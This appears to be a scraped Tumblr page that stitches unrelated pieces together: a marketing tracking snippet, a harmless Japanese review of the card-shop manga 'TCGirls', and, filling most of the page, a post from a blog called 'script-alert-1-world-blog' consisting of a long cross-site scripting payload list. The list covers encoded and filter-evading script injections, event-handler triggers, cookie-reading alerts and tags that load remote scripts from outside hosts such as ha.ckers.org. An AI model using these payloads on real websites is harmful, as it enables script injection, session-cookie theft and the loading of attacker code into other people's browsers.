eCommerceData: { shops: [] }, crypto: 'getresponse', grChat: { status: 'disabled', urlParams: null }, landingPageEncodedId: 'SfwML' }; if (grLpsInitialData) { grLpsInitialData.tracking_codes = {"googleAnalytics":[],"kissMetrics":[],"yandexMetrica":[],"mixpanel":[],"vwo":[],"facebookPixel":[],"bingAds":[],"googleTagManager":[]}; } else { var grLpsInitialData = { tracking_codes: {"googleAnalytics":[],"kissMetrics":[],"yandexMetrica":[],"mixpanel":[],"vwo":[],"facebookPixel":[],"bingAds":[],"googleTagManager":[]} } }
Tumblr media
2 notes · View notes
4komasusume · 5 years ago
Text
トレカのディテールが醸し出す趣味人の熱狂――もみのさと『TCGirls』
   すいーとポテトです。巣ごもり生活が続く中、3月頃から「MTGアリーナ」をプレイしています。MTG自体は『テンペスト』の頃から断続的にやっていて、アリーナも昨年に登録していたところ、ここにきてドカンとハマりましたね。
 さて、今日はトレーディングカードゲームを題材にした4コマ作品、もみのさと『TCGirls』を紹介します。単行本完結が2018年と少し前の作品ですが、紹介したくなったときが紹介しどき、ということで。
Tumblr media
TCGirls 1巻 (まんがタイムKRコミックス)
posted with AmaQuick at 2020.10.03
もみのさと(著), 芳文社 (2017-05-27)
Amazon.co.jpで詳細を見る
Tumblr media
TCGirls 2巻 (まんがタイムKRコミックス)
posted with AmaQuick at 2020.10.03
もみのさと(著), 芳文社 (2018-07-26)
Amazon.co.jpで詳細を見る
トレカショップのトレカな日常
Tumblr media
〔1巻19ページ〕
『TCGirls』はトレカショップ「Aster」を舞台に、店員さんやお客さんのトレカな日常を描いた作品です。主人公の小柴アンはトレカ好きが高じ��Asterでバイトを始めた高校生。店員としての自覚よりもファン心が前に出がちだけど、そのファン心がお仕事に生かされる場面がちょくちょくあります。
Tumblr media
〔1巻12ページ〕
 例えばカードの丁寧な扱い。インデックス付きのセパレーターでひと手間かけた整頓が自然にできるアン、メチャクチャ偉い……! 指の腹で端を持つ、という普段無意識にやっている行為がこのように言語化されているところに、作者のトレカに対する解像度の高さも伺えます。
Tumblr media
〔2巻38ページ〕
 イベントの企画をすることもあります。自身のお気に入りのカードが大会での使用を禁止されたことを機に「禁止カード感謝祭」を発案。どう見ても私情やんけ……と思ったら共感するお客さんがたくさんいて、結果的にイベントは大盛況で終わります。アン自身がファンだから、ファンのツボをしっかりと分かってるんだよな。また、さりげなくつぶやかれている「お店のパック3つ以上購入」にも現実のショップイベントの参加費らしさがあり、こういった細かいところにもリアルさを感じます。
 お話はこのアンを主軸に、彼女を含めて5人のキャラによって進んでいきます。
Tumblr media
〔1巻105ページ〕
 葉波(はなみ)シオンはAsterの店長さん。アンと同じ高校に通う先輩でもあり、また作中に登場する人気トレカ「ダーク・オブ・ヘヴン」のメーカーの社長令嬢でもあります。トレカはゲームプレイよりもイラストを楽しむ勢で、それゆえにショップの運営に悪戦苦闘することも。アンの奔放さには苦労しつつ、アンに一番助けられてるキャラとも言えそうです。
Tumblr media
〔1巻13ページ〕
 御厨(みくりや)メイはAsterの常連さん。小さい子ながらも大きな大会での優勝経験があるガチ勢で、しかもレアカードの開封ゲット運も強い、というTCGの申し子です。カードを保護するスリーブは漢字一文字というこだわりも。中二的な言動にはショップのお客さんやアンも結構ノリノリでついてきたりします。
Tumblr media
〔1巻52ページ〕
 大泉マナはAsterの店員でシオンの友人。ゲームセンターに設置されてるカードゲームの有名プレイヤーでもあります。常識人としての一面を持ちながらも、カードゲームにハマったきっかけがプレイヤーの手の動きに「運命を感じてしまった」から、という手フェチさん。おっこの人、見た目とは裏腹になかなか業が深いぞ。
Tumblr media
〔1巻63ページ〕
 そして鵜池(うのいけ)ニイナはアンの同級生。TCGは好きだけど引っ込み思案で環境にも恵まれなかった彼女は、アンとの交流をきっかけに対人プレイの楽しさを知っていきます。強くはないけど大丈夫、「大切なのはカードに対する“愛”!!」(メイ談)だから……。
トレカ「あるある」ネタ満載
 趣味もの作品の王道を行くように���『TCGirls』にはトレカ「あるある」ネタが満載です。いくつか見ていきましょう。
Tumblr media
〔1巻11ページ〕
 二人が思い浮かべるトレカイラストの差。シオンはリアル系が、アンは可愛い系がお好きな様子。他にもロボ系や既存IP系など、今やいろんな傾向のトレカがありますよねえ。
Tumblr media
〔1巻30ページ〕
 シングルカードの価格。可愛い顔して諭吉をみるみる減らしていくからな。「アド」がアドバンテージの略だと注釈なしで使われているあたり、TCGプレイヤーを狙い撃ちしていることが伺えます。
Tumblr media
〔1巻80ページ〕
 勉強のときもトレカのことは忘れない。その記憶力を他のものに使えばいいのに、ってことじゃないんだよ、好きなものだからこ���覚えられるんだよ……!
個別トレカの細かなネタも
 一般的なトレカあるあるに加えて、現実世界に存在する個別トレカの細かなネタに踏み込むこともあります。MTGプレイヤーのポテトが分かったMTGネタをいくつか挙げてみます。
Tumblr media
〔2巻102ページ〕
 超高額カードたち。絵柄を見るに、左から順に《Black Lotus》《Mox Sapphire》《Ancestral Recall》っぽい。版や状態によってはこのコマに書かれている値段よりも高くなるところが恐ろしいところ。
Tumblr media
〔2巻39ページ〕
「禁止カード感謝祭」にカードキャラのコスプレをして集まったお客さんたち。2コマ目の左にいる猫っぽい着ぐるみが、実際に禁止カードになった《守護フェリダー》に似てるんですよね。スタンダードで禁止されたのが2017年4月28日で、この話の掲載号が『まんがタイムきららMAX 2017年10月号』(8月発売)。ネタ出しから掲載までのリードタイムを考えると、かなりタイムリーに時事ネタを取り入れていたように見えます。
Tumblr media
〔2巻74ページ〕
 暗記を話題にしたコマで《暗記 // 記憶》のパロディ。いかにも意味ありげな構図なので「何かのパロディかな?」とは薄々気づけると思うけど、具体的なTCGやカード名までは言われないと分からない可能性があるでしょこれ。自分も最初は全く分からなかったです。でもひとたび分かると「なるほど!」と思えるネタでもあります。
Tumblr media
〔2巻8ページ〕
 そしてこれはMTGの「カラー・ホイール」! 五角形の頂点の位置こ��回転しているものの、ちゃんと白→青→黒→赤→緑→白の順序で循環しています。しかも小ネタとして用いるだけでなく、色のフレイバーを踏まえたキャラクター紹介としても機能しているのが面白いところ。アンが赤なの、自由と情熱のキャラとしてハチャメチャ正しいんだよな。
 こうして日常模様から細かなネタまで見ていくと、トレカのディテールが随所に丁寧に盛り込まれていることが分かります。その丁寧さこそが本作の魅力の源だと思うんですよね。趣味もの作品って多少なりとも「分かる人には面白い」的な内輪感が出てしまいがちだと思うんですが、『TCGirls』はあえてその内輪の方向に突き抜けてTCGプレイヤーにぶっ刺さる作品になっている。そして分からない人にも、ディテールの集合によって醸し出される奥深さや凄み、あるいはTCGという趣味にハマる人たちの熱狂が感じられるものになっている。この腹のくくりっぷりがむしろ趣味に対して誠実で、娯楽と言うものを真正面から描いていて、ああ、いいなあ、と思うのでありました。
(すいーとポテト)
1 note · View note
script-alert-1-world-blog · 6 years ago
Text
\x27\x3e\x3cimg\x20src\x3dx\x20onerror\x3d\x27alert(\x2fXSS\x2f)\x27 home'-alert(document.cookie)-'a javascript:onload('javascript:alert(1)') aaa<%tag onmouseover="($)'a').html('<'%2b'h1>xss'))">hover here aaa<%tag style=xss:expression(alert('XSS'))> <meta http-equiv="refresh" content='0; url="http://www.ey.com"> =https%3A%2F%2Fmalicous2.com"'/><meta http-equiv="refresh" content='0; url="http://www.ey.com"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" <script/src=data:,alert()> <marquee/onstart=alert()> <video/poster/onerror=alert()> <isindex/autofocus/onfocus=alert()> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> <IMG SRC=javascript:alert( 'XSS')> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097& #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=" &#14;  javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// </script><script>alert('XSS');</script> </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> <BODY ONLOAD=alert('XSS')> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(xss.htc);"> ºscriptæalert(¢XSS¢)º/scriptæ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> 0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-" veris-->group<svg/onload=alert(/XSS/)// #"><img src=M onerror=alert('XSS');> element[attribute='<img src=x onerror=alert('XSS');> [<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ] %22;alert%28%27RVRSH3LL_XSS%29// javascript:alert%281%29; <w contenteditable id=x onfocus=alert()> alert;pg("XSS") <svg/onload=%26%23097lert%26lpar;1337)> <script>for((i)in(self))eval(i)(1)</script> <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt> <sCR<script>iPt>alert(1)</SCr</script>IPt> <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a> '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)> <script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script> <script>alert(document.cookie)</script>"> <img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id)>'"> <img src="http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg"> <svg onload="void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d %0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'; "></svg> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <INPUT TYPE="BUTTON" action="alert('XSS')"/> "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> "></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF "><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1> "><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1> ><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 <IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> <iframe src=http://xss.rocks/scriptlet.html < <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <iframe  src="&Tab;javascript:prompt(1)&Tab;"> <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt >alert&lpar;1&rpar; {Opera} <img/src=`` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript&colon;confirm(1)" <img src=``&NewLine; onerror=alert(1)&NewLine; <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /**/>/**/alert(1)/**/</script /**/ "><h1/onmouseover='\u0061lert(1)'> <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data&colon;,window.open('https://www.google.com/') </script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome&colon;prompt(1)"/*/onerror='eval(src)'> <img/ &#11; src=`~` onerror=prompt(1)> <form><iframe &#11; src="javascript:alert(1)"&#11; ;> <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" &#11;>X</a http://www.google<script .com>alert(document.location)</script <a href=[&#00;]"&#00; onmouseover=prompt(1)//">XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style ><script :-(>/**/alert(document.location)/**/</script :-( &#00;</form><input type="date" onfocus="alert(1)"> <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='<body onload=prompt&lpar;1&rpar;>'> <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=<!-- >alert&lpar;1&rpar;> <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) "><svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert(1)'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe// src=javaSCRIPT&colon;alert(1) //<form/action=javascript:alert&lpar;document&period;cookie&rpar;><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} <a href="javascript&colon;\u0061l&#101%72t&lpar;1&rpar;"><button> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> <svg><script ?>alert(1) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(1)> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript&colon;\u0061l&#101%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=<!-->&#10alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//&NewLine;confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> 